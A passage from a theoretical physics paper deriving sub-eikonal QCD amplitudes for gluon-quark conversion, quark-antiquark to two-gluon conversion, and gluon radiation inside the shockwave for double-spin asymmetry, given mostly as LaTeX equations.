0|\hat{b}_{m^{\prime},\sigma}(p^{\prime+},{\bf z}) \Big{[}g\int_{{\bf y},q^{+}}\frac{1}{2q^{+}}\hat{b}^{\dagger}_{n,\rho}(q^{+}, {\bf x})\bar{u}_{G,\rho}(q^{+})\hat{a}_{e,\kappa}(q^{+},{\bf y})\\ &\qquad\times\varepsilon^{i}_{\kappa}\gamma_{i}t^{e}_{nn^{\prime }}\psi_{B,n^{\prime}}(w^{+},{\bf y})\Big{]}\hat{a}^{\dagger}_{c^{\prime}, \lambda}(p^{+},{\bf x})|0\rangle{U^{c^{\prime}c}_{\bf x}}(w^{+},x_{0}^{+})\\ =&(2\pi)2p^{+}\delta(p^{+}-p^{\prime+})\delta({\bf x }-{\bf z}){\cal M}^{g\to q}(x^{+},x_{0}^{+};p^{+},{\bf x},\{c,\lambda\},\{m, \sigma\})\end{split} \tag{37}\] The gluon-quark conversion process preserves the longitudinal momentum and transverse coordinates. It only changes the color and spin quantum numbers. After factorizing out the Dirac delta functions, the conversion amplitude is \[\begin{split}&{\cal M}^{g\to q}(x^{+},x_{0}^{+};p^{+},{\bf x},\{c, \lambda\},\{m,\sigma\})\\ =&-ig\int_{x_{0}^{+}}^{x^{+}}V^{mm^{\prime}}_{\bf x }(x^{+},w^{+})\frac{1}{2p^{+}}\bar{u}_{G,\sigma}(p^{+})\varepsilon^{i}_{ \lambda}\gamma_{i}t^{e}_{m^{\prime}n}\psi_{B,n}(w^{+},{\bf x})U^{ec}_{\bf x}(w ^{+},x_{0}^{+}).\end{split} \tag{38}\] Repeating the above calculations, one obtains the amplitude for gluon to antiquark conversion, \[\begin{split}&{\cal M}^{g\to q}(x^{+},x_{0}^{+};p^{+},{\bf x},\{c, \lambda\},\{m,\sigma\})\\ =&+ig\int_{x_{0}^{+}}^{x^{+}}dw^{+}V^{\dagger m^{ \prime}m}_{\bf x}(x^{+},w^{+})\bar{\psi}_{B,n}(w^{+};{\bf x})\gamma_{i} \varepsilon^{i}_{\lambda}t^{e}_{nm^{\prime}}\frac{1}{2p^{+}}v_{G,\sigma}(p^{+ })U^{ec}_{\bf x}(w^{+},x_{0}^{+}).\end{split} \tag{39}\] for quark to gluon inverse conversion, the amplitude is \[\begin{split}&{\cal M}^{q\to g}(x^{+},x_{0}^{+};p^{+},{\bf x},\{m,\sigma\},\{c,\lambda\})\\ =&-ig\int_{x_{0}^{+}}^{x^{+}}dw^{+}U^{ec}_{\bf x}(x^ {+},w^{+})\frac{1}{2p^{+}}\bar{\psi}_{B,n}(w^{+},{\bf x})\gamma_{i}t^{e}_{nm^{ \prime}}\varepsilon^{i*}_{\lambda}u_{G,\sigma}(p^{+})V^{m^{\prime}m}_{\bf x}(w ^{+},x_{0}^{+}).\end{split} \tag{40}\] for antiquark to gluon conversion, \[\begin{split}&\mathcal{M}^{\bar{q}\to g}(x^{+},x_{0}^{+};p^{+}, \mathbf{x},\{m,\sigma\},\{c,\lambda\})\\ =&+ig\int_{x_{0}^{+}}^{x^{+}}dw^{+}U^{ce}_{\mathbf{x} }(x^{+},w^{+})\frac{1}{2p^{+}}\bar{v}_{G,\sigma}(p^{+})\varepsilon^{i\star}_{ \lambda}\gamma_{i}t^{e}_{m^{\prime}n^{\prime}}\psi_{B,n^{\prime}}(w^{+}; \mathbf{x})V^{\dagger mm^{\prime}}_{\mathbf{x}}(w^{+},x_{0}^{+}).\end{split} \tag{3.21}\] Again, this expression can be obtained by directly applying charge conjugation on eq. (3.20). ### Quark-antiquark pair converted to two gluons Using the eikonality expansion of the S matrix operator from eq. (2.21), one can also compute the sub-eikonal process that a pair of quark and antiquark is converted into two gluons \(\langle gg|\hat{S}|q\bar{q}\rangle\), see Fig. 3. In principle, one can obtain the amplitude \(M^{q\bar{q}\to gg}\) as the product of two amplitudes computed in eqs. (3.20) and (3.21) \[M^{q\bar{q}\to gg}=M^{q\to g}M^{\bar{q}\to g}. \tag{3.22}\] However, we would like to demonstrate that this process can be directly computed from the eikonality expansion of the S matrix operator in eq. (2.21), thus providing further evidence on the validity of the expansion. \[\begin{split}& M^{q\bar{q}\to gg}(\{k_{1}^{+},\mathbf{x}_{1},m_{1}, \sigma_{1}\},\{k_{2}^{+},\mathbf{x}_{2},m_{2},\sigma_{2}\};\{p_{1}^{+}, \mathbf{y}_{1},c_{1},\lambda_{1}\},\{p_{2}^{+},\mathbf{y}_{2},c_{2},\lambda_{ 2}\})\\ =&\langle 0|\hat{a}_{c_{1},\lambda_{1}}(p_{1}^{+}, \mathbf{y}_{1})\hat{a}_{c_{2},\lambda_{2}}(p_{2}^{+},\mathbf{y}_{2})\,\hat{S} \,\hat{b}^{\dagger}_{m_{1},\sigma_{1}}(k_{1}^{+},\mathbf{x}_{1})\hat{d}^{ \dagger}_{m_{2},\sigma_{2}}(k_{2}^{+},\mathbf{x}_{2})|0\rangle\\ =&-\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+} }^{w_{2}^{+}}dw_{1}^{+}\langle 0|\hat{a}_{c_{1},\lambda_{1}}(p_{1}^{+}, \mathbf{y}_{1})\hat{a}_{c_{2},\lambda_{2}}(p_{2}^{+},\mathbf{y}_{2})\Big{[} \hat{W}(x^{+},w_{2}^{+})V_{(1/2)}(w_{2}^{+})\hat{W}(w_{2}^{+},w_{1}^{+})\\ &\qquad\times V_{(1/2)}(w_{1}^{+})\hat{W}(w_{1}^{+},x_{0}^{+}) \Big{]}\hat{b}^{\dagger}_{m_{1},\sigma_{1}}(k_{1}^{+},\mathbf{x}_{1})\hat{d}^ {\dagger}_{m_{2},\sigma_{2}}(k_{2}^{+},\mathbf{x}_{2})|0\rangle\\ =&-\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+} }^{w_{2}^{+}}dw_{1}^{+}U^{c_{1}h_{1}}_{\mathbf{y}_{1}}(x^{+},w_{2}^{+})U^{c_{ 2}h_{2}}_{\mathbf{y}_{2}}(x^{+},w_{2}^{+})\langle 0|\hat{a}_{h_{1}, \lambda_{1}}(p_{1}^{+},\mathbf{y}_{1})\hat{a}_{h_{2},\lambda_{2}}(p_{2}^{+}, \mathbf{y}_{2})\\ &\qquad\times\hat{V}_{(1/2)}(w_{2}^{+})\hat{W}(w_{2}^{+},w_{1}^{+ })\hat{V}_{(1/2)}(w_{1}^{+})\hat{b}^{\dagger}_{n_{1},\sigma_{1}}(k_{1}^{+}, \mathbf{x}_{1})\hat{d}^{\dagger}_{n_{2},\sigma_{2}}(k_{2}^{+},\mathbf{x}_{2}) |0\rangle\\ &\qquad\times V^{n_{1}m_{1}}_{\mathbf{x}_{1}}(w_{1}^{+},x_{0}^{+} )V^{\dagger m_{2}n_{2}}_{\mathbf{x}_{2}}(w_{1}^{+},x_{0}^{+}).\end{split} \tag{3.23}\] We have used the identities \(\hat{W}\hat{b}^{\dagger}_{j}\hat{W}^{\dagger}=\hat{b}^{\dagger}_{i}V_{ij}\), \(\hat{W}\hat{d}^{\dagger}_{i}\hat{W}^{\dagger}=V^{\dagger}_{ij}\hat{d}^{\dagger}_ {j}\) and \(\hat{W}^{\dagger}\hat{a}_{c}\hat{W}=U^{ch}\hat{a}_{h}\) which are valid at the eikonal order. Among the terms in \(V_{(1/2)}(w_{1}^{+})\) and \(V_{(1/2)}(w_{2}^{+})\), there are Figure 3: The process of \(q\bar{q}\to gg\) induced by background quark fields. only two combinations that give nonvanishing contributions. One combination is \[\hat{V}_{(1/2)}(w_{2}^{+})=g\int_{\mathbf{z}^{\prime}}\int_{p^{+}} \frac{1}{2p^{\prime+}}\bar{\psi}_{B,l^{\prime}}(w_{2}^{+},\mathbf{z}^{\prime}) \gamma_{i^{\prime}}t_{l^{\prime}j^{\prime}}^{e^{\prime}}\hat{a}_{e^{\prime}, \lambda^{\prime}}^{\dagger}(p^{\prime+},\mathbf{z}^{\prime})\varepsilon_{ \lambda^{\prime}}^{i^{\prime}*}\hat{b}_{j^{\prime},s^{\prime}}(p^{\prime+}, \mathbf{z}^{\prime})u_{G,s^{\prime}}(p^{\prime+}) \tag{3.24}\] and \[\hat{V}_{(1/2)}(w_{1}^{+})=g\int_{\mathbf{z}}\int_{p^{+}}\frac{1}{2p^{+}}\hat {d}_{j,s}(p^{+},\mathbf{z})\bar{v}_{G,s}(p^{+})\hat{a}_{e,\lambda}^{\dagger}(p ^{+},\mathbf{z})\varepsilon_{\lambda}^{i*}\gamma_{i}t_{jl}^{e}\psi_{B,l}(w_{1 }^{+},\mathbf{z}). \tag{3.25}\] The other combination is to switch the expressions by \(w_{1}^{+}\leftrightarrow w_{2}^{+}\). Using these expressions, eq. (3.23) can be expressed as \[\begin{split}&\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^ {w_{2}^{+}}dw_{1}^{+}\left[(2\pi)2k_{1}^{+}\delta(k_{1}^{+}-p_{1}^{+})\delta( \mathbf{x}_{1}-\mathbf{y}_{1})(2\pi)2k_{2}^{+}\delta(k_{2}^{+}-p_{2}^{+}) \delta(\mathbf{x}_{2}-\mathbf{y}_{2})\right]\\ &\qquad\times g^{2}\frac{1}{2k_{1}^{+}}\frac{1}{2k_{2}^{+}}\bar{ \psi}_{B,l^{\prime}}(w_{2}^{+},\mathbf{x}_{1})t_{l^{\prime}n_{1}^{\prime}}^{h_ {1}}\gamma_{i^{\prime}}\varepsilon_{\lambda_{1}}^{i^{\prime}*}u_{G,\sigma_{1}} (k_{1}^{+})\bar{v}_{G,\sigma_{2}}(k_{2}^{+})\gamma_{i}\varepsilon_{\lambda_{2} }^{i*}t_{n2l}^{e}\psi_{B,l}(w_{1}^{+},\mathbf{x}_{2})\\ &\qquad\times U_{\mathbf{x}_{1}}^{c_{1}h_{1}}(x^{+},w_{2}^{+})V_{ \mathbf{x}_{1}}^{n_{1}^{\prime}m_{1}}(w_{2}^{+},x_{0}^{+})U_{\mathbf{x}_{2}}^ {c_{2}e}(x^{+},w_{1}^{+})V_{\mathbf{x}_{2}}^{\dagger m_{2}n_{2}}(w_{1}^{+},x_ {0}^{+})\\ &\qquad+(w_{1}^{+}\leftrightarrow w_{2}^{+}).\end{split} \tag{3.26}\] (The extra minus sign comes from moving the annihilation operator \(\hat{d}_{j,s}\) across \(\psi_{B,l}\).) Exchanging \(w_{1}^{+}\) and \(w_{2}^{+}\) is only for the integrand. It is equivalent to exchanging \(w_{1}^{+}\) and \(w_{2}^{+}\) in the integration measures while keeping the integrand unchanged. We will use \[\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{w_{2}^{+}}dw_{1}^{+}+\int_ {x_{0}^{+}}^{x^{+}}dw_{1}^{+}\int_{x_{0}^{+}}^{w_{1}^{+}}dw_{2}^{+}=\int_{x_{0 }^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{x^{+}}dw_{1}^{+}. \tag{3.27}\] The final result for the scattering amplitude is \[\begin{split}& M^{q\bar{q}\to gg}\\ =&\left[(2\pi)2k_{1}^{+}\delta(k_{1}^{+}-p_{2}^{+}) \delta(\mathbf{x}_{1}-\mathbf{y}_{2})(2\pi)2k_{2}^{+}\delta(k_{2}^{+}-p_{1}^{+ })\delta(\mathbf{x}_{2}-\mathbf{y}_{1})\right]\int_{x_{0}^{+}}^{x^{+}}dw_{2}^ {+}\int_{x_{0}^{+}}^{x^{+}}dw_{1}^{+}\\ &\times g^{2}\frac{1}{4\sqrt{k_{1}^{+}k_{2}^{+}}}\bar{\psi}_{B,l ^{\prime}}(w_{2}^{+},\mathbf{x}_{1})\left[t^{h}V_{\mathbf{x}_{1}}(w_{2}^{+},x_ {0}^{+})\right]_{l^{\prime}m_{1}}[\gamma^{-}+\lambda_{2}\gamma^{-}\gamma^{5}] \delta_{\lambda_{1},-\lambda_{2}}\\ &\qquad\times\left[V_{\mathbf{x}_{2}}^{\dagger}(w_{1}^{+},x_{0}^{+ })t^{e}\right]_{m_{2}l}\psi_{B,l}(w_{1}^{+},\mathbf{x}_{2})U_{\mathbf{x}_{1}}^ {c_{2}h}(x^{+},w_{2}^{+})U_{\mathbf{x}_{2}}^{c_{1}e}(x^{+},w_{1}^{+})\\ &+\left[(2\pi)2k_{1}^{+}\delta(k_{1}^{+}-p_{1}^{+})\delta( \mathbf{x}_{1}-\mathbf{y}_{1})(2\pi)2k_{2}^{+}\delta(k_{2}^{+}-p_{2}^{+}) \delta(\mathbf{x}_{2}-\mathbf{y}_{2})\right]\int_{x_{0}^{+}}^{x^{+}}dw_{2}^ {+}\int_{x_{0}^{+}}^{x^{+}}dw_{1}^{+}\\ &\times g^{2}\frac{1}{4\sqrt{k_{1}^{+}k_{2}^{+}}}\bar{\psi}_{B,l ^{\prime}}(w_{2}^{+},\mathbf{x}_{1})\left[t^{h}V_{\mathbf{x}_{1}}(w_{2}^{+},x_ {0}^{+})\right]_{l^{\prime}m_{1}}[\gamma^{-}+\lambda_{1}\gamma^{-}\gamma^{5}] \delta_{-\lambda_{1},\lambda_{2}}\\ &\qquad\times\left[V_{\mathbf{x}_{2}}^{\dagger}(w_{1}^{+},x_{0}^{+ })t^{e}\right]_{m_{2}l}\psi_{B,l}(w_{1}^{+},\mathbf{x}_{2})U_{\mathbf{x}_{1}}^ {c_{1}h}(x^{+},w_{2}^{+})U_{\mathbf{x}_{2}}^{c_{2}e}(x^{+},w_{1}^{+}).\end{split} \tag{3.28}\] This expression is exactly the same as \(M^{q\to g}M^{\bar{q}\to g}\) using eq. (3.20) and eq. (3.21). The spinor space matrix elements have been further simplified by requiring the quark antiquark spin states satisfy \(\delta_{\sigma_{1},-\sigma_{2}}\). This is generally true when the quark antiquark pair comes from a photon/gluon splitting. We have used the spinor space identity \[\begin{split}&\gamma_{\bar{\nu}}\varepsilon_{\lambda_{2}}^{i^{\prime }*}u_{G,\sigma_{1}}(k_{1}^{+})\bar{v}_{G,\sigma_{2}}(k_{2}^{+})\gamma_{\bar{\nu }}\varepsilon_{\lambda_{1}}^{i*}\delta_{\sigma_{1},-\sigma_{2}}\\ =&\sqrt{k_{1}^{+}k_{2}^{+}}[\gamma^{-}+\lambda_{2} \gamma^{-}\gamma^{5}]\delta_{\lambda_{1},-\lambda_{2}}\end{split} \tag{3.29}\] whose derivation can be found in the appendix B. It is interesting to note that the polarizations of the two outgoing gluons are opposite. ## 4 Gluon Radiation Inside the Shockwave The small \(x\) effective Hamiltonian derived in Sec. 2.3 predicts that gluon radiation inside the shockwave, induced by background gluon fields, contributes to physical processes at sub-eikonal order. In this section, we discuss two specific situations in which gluon radiation inside the shock contributes. One is about double-spin asymmetry for soft gluon production in longitudinally polarized collisions. The other is about small \(x\) rapidity evolution of chromro-magnetically polarized Wilson line correlator. It is noted that gluon radiation inside the shockwave has been incorporated in studying gluon TMD evolution in [23; 24]. In the context of jet quenching in heavy-ion collisions, medium induced gluon radiation has also been studied in [29; 30]. ### Longitudinal double-spin asymmetry for soft gluon production For the incoming gluon we use \(c,\lambda,p^{+},\mathbf{p}\) to denote its color, polarization and momentum. For the two outgoing gluons their color, polarization and momentum are \(c_{1},\lambda_{1},p_{1}^{+},\mathbf{p}_{1}\) and \(c_{2},\lambda_{2},p_{2}^{+},\mathbf{p}_{2}\), respectively. It is easier to do calculations in the mixed representation in which longitudinal momentum and transverse positions are used. We thus denote the corresponding transverse coordinates of the incoming and outgoing gluons as \(\mathbf{x}_{0},\mathbf{x}_{1},\mathbf{x}_{2}\). We focus on the situation that one of the outgoing gluons is in the midrapidity region. The longitudinal momenta satisfy \(p_{1}^{+}\ll p_{2}^{+}\sim p^{+}\) or \(p_{1}^{+}=zp^{+}\) with \(z\to 0\). We calculate the first diagram in Fig. 4, representing the interference term between eikonal order initial state gluon radiation and the sub-eikonal order gluon radiation inside the shockwave. The eikonal order gluon radiation amplitude is computed as \[\mathcal{M}_{2}= \delta(\mathbf{x}_{0}-\mathbf{x}_{2})(igf^{ce_{1}e_{2}})(2\delta \lambda_{\lambda_{2}}\varepsilon_{\lambda_{1}}^{j*})\frac{i}{2\pi}\frac{( \mathbf{x}_{1}-\mathbf{x}_{0})^{j}}{|\mathbf{x}_{1}-\mathbf{x}_{0}|^{2}}U_{ \mathbf{x}_{1}}^{c_{1}e_{1}}U_{\mathbf{x}_{0}}^{c_{2}e_{2}}. \tag{4.1}\] For gluon radiation inside the shockwave, the amplitude is computed using the formula eq. (21). \[M_{3}= \langle 0|\hat{a}_{c_{2},\lambda_{2}}(p_{2}^{+},{\bf x}_{2})\hat{a}_{c _{1},\lambda_{1}}(p_{1}^{+},{\bf x}_{1})\hat{S}(x^{+},x_{0}^{+})\hat{a}_{c, \lambda}^{\dagger}(p^{+},{\bf x}_{0})|0\rangle\] \[= -i\xi\int_{x_{0}^{+}}^{x^{+}}dw^{+}\langle 0|\hat{a}_{c_{2}, \lambda_{2}}(p_{2}^{+},{\bf x}_{2})\hat{a}_{c_{1},\lambda_{1}}(p_{1}^{+},{\bf x }_{1})\hat{W}(x^{+},x_{0}^{+})\hat{V}_{ggga}(w^{+})\hat{W}(w^{+},x_{0}^{+}) \hat{a}_{c,\lambda}^{\dagger}(p^{+},{\bf x}_{0})|0\rangle\] \[= -i\xi\int_{x_{0}^{+}}^{x^{+}}dw^{+}U^{c_{1}e_{1}}_{{\bf x}_{1}}( x^{+},w^{+})U^{c_{2}e_{2}}_{{\bf x}_{2}}(x^{+},w^{+})U^{cc}_{{\bf x}_{0}}(w^{+},x _{0}^{+})\] \[\qquad\times\,\langle 0|\hat{a}_{e_{1},\lambda_{1}}(p_{1}^{+},{\bf x }_{1})\hat{a}_{e_{2},\lambda_{2}}(p_{2}^{+},{\bf x}_{2})\hat{V}_{ggga}(w^{+}) \hat{a}_{e,\lambda}^{\dagger}(p^{+},{\bf x}_{0})|0\rangle\] \[= (2\pi)2p^{+}\delta(-p^{+}+p_{1}^{+}+p_{2}^{+})\frac{1}{2p^{+}} \xi\int_{x_{0}^{+}}^{x^{+}}dw^{+}U^{c_{1}e_{1}}_{{\bf x}_{1}}(x^{+},w^{+})U^{ c_{2}e_{2}}_{{\bf x}_{2}}(x^{+},w^{+})U^{ec}_{{\bf x}_{0}}(w^{+},x_{0}^{+})\] \[\times\left[(igf^{dee_{1}})[-{\cal D}^{i}_{{\bf x}_{2}}\delta({ \bf x}_{2}-{\bf x}_{0})]_{de_{2}}\delta({\bf x}_{1}-{\bf x}_{0})\left(\varepsilon ^{i}_{\lambda}\delta_{\lambda_{2},-\lambda_{1}}-\varepsilon^{i*}_{\lambda_{1}} \delta_{\lambda_{2}\lambda}-\frac{p^{+}+p_{1}^{+}}{p_{2}^{+}}\delta_{\lambda_{ 1}\lambda}\varepsilon^{i*}_{\lambda_{2}}\right)\right.\] \[\qquad+(igf^{dee_{2}})[-{\cal D}^{i}_{{\bf x}_{1}}\delta({\bf x} _{1}-{\bf x}_{0})]_{de_{1}}\delta({\bf x}_{2}-{\bf x}_{0})\left(\varepsilon^{ i}_{\lambda}\delta_{\lambda_{1},-\lambda_{2}}-\varepsilon^{i*}_{\lambda_{2}} \delta_{\lambda_{1}\lambda}-\frac{p^{+}+p_{2}^{+}}{p_{1}^{+}}\delta_{\lambda \lambda_{2}}\varepsilon^{i*}_{\lambda_{1}}\right)\] \[\qquad+(igf^{de_{1}e_{2}})[-{\cal D}^{i}_{{\bf x}_{0}}\delta({ \bf x}_{2}-{\bf x}_{0})]_{de}\delta({\bf x}_{1}-{\bf x}_{2})\left(\delta_{ \lambda\lambda_{2}}\varepsilon^{i*}_{\lambda_{1}}-\delta_{\lambda\lambda_{1}} \varepsilon^{i*}_{\lambda_{2}}-\frac{p_{1}^{+}-p_{2}^{+}}{p^{+}}\varepsilon^{ i}_{\lambda}\delta_{\lambda_{1},-\lambda_{2}}\right)\Big{]} \tag{4.2}\] Here \(\hat{V}_{ggga}\) represent the background field induced triple gluon interaction vertex given in eq. (38). For the two contributing vertices in eq. (38), one is local in longitudinal coordinate while the other one is nonlocal. Eq. (4.2) needs to be simplified by taking the limit \(z\to 0\) with \(p_{1}^{+}=zp^{+}\). In fact, terms that contain the polarization factor \(\delta_{\lambda\lambda_{2}}\varepsilon^{i*}_{\lambda_{1}}\) can be ignored because these terms do not communicate polarization of the incoming gluon to the outgoing gluons, leading to final result independent of the incoming gluon polarization, thus won't contribute to double-spin asymmetry. It is interesting to note that these terms happen to involve the factor \(1/z\) in the soft gluon limit. There is the possible combination that the \(1/z\) order gluon radiation inside the shock-wave in the amplitude can combine with the complex conjugate amplitude in which the Figure 4: The interference terms involving gluon radiation inside the shock wave. The red gluon line inside the shockwave represents the background gluon fields. The green cross indicates the tagged soft gluon. next-to-eikonal (order \(z\), see appendix B for explicit expression) gluon is radiated either before or after eikonal scatterings. This combination turns out to give exactly the same result as the eq. (4.5). Only keeping terms at \(z^{0}\) order and excluding terms proportional to \(\delta_{\lambda\lambda_{2}}\varepsilon^{i*}_{\lambda_{1}}\), the simplified expression of \(M_{3}\) contributing to double-spin asymmetry is \[\begin{split}\mathcal{M}_{3}=&\frac{1}{2p^{+}}\int_ {x_{0}^{+}}^{x^{+}}dw^{+}U^{c_{1}e_{1}}_{\mathbf{x}_{1}}(x^{+},w^{+})U^{c_{2} e_{2}}_{\mathbf{x}_{2}}(x^{+},w^{+})U^{ec}_{\mathbf{x}_{0}}(w^{+},x_{0}^{+})\\ &\times\left(igf^{ee_{1}e_{2}}\left[-\partial^{i}_{\mathbf{x}_{2 }}\delta(\mathbf{x}_{2}-\mathbf{x}_{0})\delta(\mathbf{x}_{1}-\mathbf{x}_{0})+ \partial^{i}_{\mathbf{x}_{1}}\delta(\mathbf{x}_{1}-\mathbf{x}_{0})\delta( \mathbf{x}_{2}-\mathbf{x}_{0})-\partial^{i}_{\mathbf{x}_{0}}\delta(\mathbf{x} _{2}-\mathbf{x}_{0})\delta(\mathbf{x}_{1}-\mathbf{x}_{2})\right]\\ &\quad+ig^{2}a^{i}_{b}(\mathbf{x}_{1})\delta(\mathbf{x}_{2}- \mathbf{x}_{0})\delta(\mathbf{x}_{1}-\mathbf{x}_{0})2(T^{e}T^{e_{1}})_{e_{2}b }\right)\left(\varepsilon^{i}_{\lambda}\delta_{\lambda_{2},-\lambda_{1}}- \delta_{\lambda_{1}\lambda}\varepsilon^{i*}_{\lambda_{2}}\right)\end{split} \tag{4.3}\] In the above expression, we have explicitly separated the spatial derivative terms and terms containing the background gluon field. When computing the interferecnce term \(M_{3}M_{2}^{*}\), the polarization factors involved is \[\sum_{\lambda_{1},\lambda_{2}}\left(\delta_{\lambda_{2},-\lambda_{1}} \varepsilon^{i}_{\lambda}-\delta_{\lambda\lambda_{1}}\varepsilon^{i*}_{\lambda _{2}}\right)\delta_{\lambda^{\prime}\lambda_{2}}\varepsilon^{j}_{\lambda_{1}}= \varepsilon^{i}_{\lambda}\varepsilon^{j*}_{\lambda^{\prime}}-\varepsilon^{j}_ {\lambda}\varepsilon^{i*}_{\lambda^{\prime}}=\delta_{\lambda\lambda^{\prime}} (-i\lambda\epsilon^{ij}). \tag{4.4}\] The final result for the interference term \(M_{3}M_{2}^{*}\) is \[\begin{split}&\int_{\mathbf{x}_{1},\mathbf{x}_{1}^{\prime}}e^{-i \mathbf{p}_{1}\cdot(\mathbf{x}_{1}-\mathbf{x}_{1}^{\prime})}\sum_{c,c_{1},c_{ 2},\lambda_{1},\lambda_{2}}\int_{\mathbf{x}_{2},p_{2}^{+},\mathbf{x}_{0}^{ \prime},\mathbf{x}_{0}^{\prime}}\mathcal{M}_{3}\mathcal{M}_{2}^{*}(2\pi)2p^{+ }\delta(p^{+}-p_{1}^{+}-p_{2}^{+})+c.c.\\ =&-\lambda\delta_{\lambda\lambda^{\prime}}2g^{2}N_{ c}\int_{\mathbf{x}_{1},\mathbf{x}_{1}^{\prime}}e^{-i\mathbf{p}_{1}\cdot( \mathbf{x}_{1}-\mathbf{x}_{1}^{\prime})}\frac{1}{2\pi}\frac{\varepsilon^{ij} (\mathbf{x}_{1}^{\prime}-\mathbf{x}_{1})^{j}}{|\mathbf{x}_{1}^{\prime}-\mathbf{ x}_{1}|^{2}}\\ &\qquad\times\frac{1}{2p^{+}}\int_{x_{0}^{+}}^{x^{+}}dw^{+} \mathrm{Tr}\left[U_{\mathbf{x}_{1}}(x^{+},w^{+})\left(\overrightarrow{\mathcal{D }}^{i}_{\mathbf{x}_{1}}-\overleftarrow{\mathcal{D}}^{i}_{\mathbf{x}_{1}} \right)U_{\mathbf{x}_{1}}(w^{+},x_{0}^{+})U^{\dagger}_{\mathbf{x}_{1}^{ \prime}}\right]+c.c.\\ =&-\lambda\delta_{\lambda\lambda^{\prime}}4g^{2}N_{ c}\int_{\mathbf{x}_{1},\mathbf{x}_{1}^{\prime}}e^{-i\mathbf{p}_{1}\cdot( \mathbf{x}_{1}-\mathbf{x}_{1}^{\prime})}\frac{1}{2\pi}\frac{\varepsilon^{ij} (\mathbf{x}_{1}^{\prime}-\mathbf{x}_{1})^{j}}{|\mathbf{x}_{1}^{\prime}- \mathbf{x}_{1}|^{2}}\mathrm{Tr}\left[U^{iG[2]}_{\mathbf{x}_{1}}U^{\dagger}_{ \mathbf{x}_{1}^{\prime}}\right]+c.c.\end{split} \tag{4.5}\] In obtaining the first equality, we have simplified the Wilson line structures as follows \[\begin{split}& U^{c_{1}c_{1}^{\prime}}_{\mathbf{x}_{1}}(x^{+},w^{+})U^{ c_{2}c_{2}^{\prime}}_{\mathbf{x}_{1}}(x^{+},w^{+})U^{c_{\prime}c}_{\mathbf{x}_{1}}(w^{+},x_{0}^{ +})\left[-U_{\mathbf{x}_{1}^{\prime}}T^{c}U^{\dagger}_{\mathbf{x}_{1}}\right] ^{c_{1}c_{2}}2(T^{c^{\prime}}T^{c_{1}^{\prime}})_{c_{2}^{\prime}b}\\ &=-2N_{c}\mathrm{Tr}\left[U_{\mathbf{x}_{1}}(x^{+},w^{+})T^{b}U_{ \mathbf{x}_{1}}(w^{+},x_{0}^{+})U^{\dagger}_{\mathbf{x}_{1}^{\prime}}\right]. \end{split} \tag{4.6}\] \[\begin{split}&\int_{\mathbf{x}_{0}}U^{c_{1}c_{1}^{\prime}}_{ \mathbf{x}_{1}}(x^{+},w^{+})U^{c_{2}c_{2}^{\prime}}_{\mathbf{x}_{1}}(x^{+},w^{+ })U^{c_{\prime}c}_{\mathbf{x}_{0}}(w^{+},x_{0}^{+})\left[-U_{\mathbf{x}_{1}^{ \prime}}T^{c}U^{\dagger}_{\mathbf{x}_{1}}\right]^{c_{1}c_{2}}if^{c^{\prime}c_ {1}^{\prime}c_{2}^{\prime}}[-\partial^{i}_{\mathbf{x}_{0}}\delta(\mathbf{x}_{1}- \mathbf{x}_{0})]\\ =&-N_{c}\mathrm{Tr}\left[U_{\mathbf{x}_{1}^{\prime}} \partial^{i}_{\mathbf{x}_{1}}U^{\dagger}_{\mathbf{x}_{1}}(w^{+},x_{0}^{+})U^{ \dagger}_{\mathbf{x}_{1}}(x^{+},w^{+})\right]\\ &\qquad-\mathrm{Tr}\left[U_{\mathbf{x}_{1}^{\prime}}U^{\dagger}_{ \mathbf{x}_{1}}(w^{+},x_{0}^{+})T^{c^{\prime}}(\partial^{i}_{\mathbf{x}_{1}}U_{ \mathbf{x}_{1}}(w^{+},x_{0}^{+}))U^{\dagger}_{\mathbf{x}_{1}}(w^{+},x_{0}^{+})T^{c ^{\prime}}U^{\dagger}_{\mathbf{x}_{1}}(x^{+},w^{+})\right].\end{split} \tag{4.7}\] \[\begin{split}&\int_{\mathbf{x}_{2}}U^{c_{1}c_{1}^{\prime}}_{ \mathbf{x}_{1}}(x^{+},w^{+})U^{c_{2}c_{2}^{\prime}}_{\mathbf{x}_{2}}(x^{+},w^{+ })U^{c_{\prime}c}_{\mathbf{x}_{1}}(w^{+},x_{0}^{+})\left[-U_{\mathbf{x}_{1}^{ \prime}}T^{c}U^{\dagger}_{\mathbf{x}_{2}}\right]^{c_{1}c_{2}}if^{c^{\prime}c_ {1}^{\prime}c_{2}^{\prime}}\left[-\partial^{i}_{\mathbf{x}_{2}}\delta(\mathbf{x}_{2}- \mathbf{x}_{1})\right]\\ =&-\mathrm{Tr}\left[U_{\mathbf{x}_{1}^{\prime}}U^{ \dagger}_{\mathbf{x}_{1}}(w^{+},x_{0}^{+})T^{c^{\prime}}U_{\mathbf{x}_{1}}(w^{+ },x_{0}^{+})\partial^{i}_{\mathbf{x}_{1}}U^{\dagger}_{\mathbf{x}_{1}}(w^{+},x_{0 }^{+})T^{c^{\prime}}U^{\dagger}_{\mathbf{x}_{1}}(x^{+},w^{+})\right].\end{split} \tag{4.8}\] \[\int_{\mathbf{x}_{0}}U^{c_{1}c^{\prime}_{1}}_{\mathbf{x}_{1}}(x^{+},w^ {+})U^{c_{2}c^{\prime}_{2}}_{\mathbf{x}_{0}}(x^{+},w^{+})U^{c^{\prime}c}_{\mathbf{ x}_{0}}(w^{+},x_{0}^{+})\left[-U_{\mathbf{x}^{\prime}_{1}}T^{c}U^{\dagger}_{ \mathbf{x}_{0}}\right]^{c_{1}c_{2}}if^{c^{\prime}c^{\prime}_{1}c^{\prime}_{2}} \partial^{i}_{\mathbf{x}_{1}}\delta(\mathbf{x}_{1}-\mathbf{x}_{0}) \tag{4.9}\] \[= N_{c}\mathrm{Tr}[\partial^{i}_{\mathbf{x}_{1}}U_{\mathbf{x}_{1}} (x^{+},w^{+})U_{\mathbf{x}_{1}}(w^{+},x_{0}^{+})U^{\dagger}_{\mathbf{x}^{ \prime}_{1}}].\] In the last expression, we have used integration by parts for \(\partial^{i}_{\mathbf{x}_{1}}\), noting that 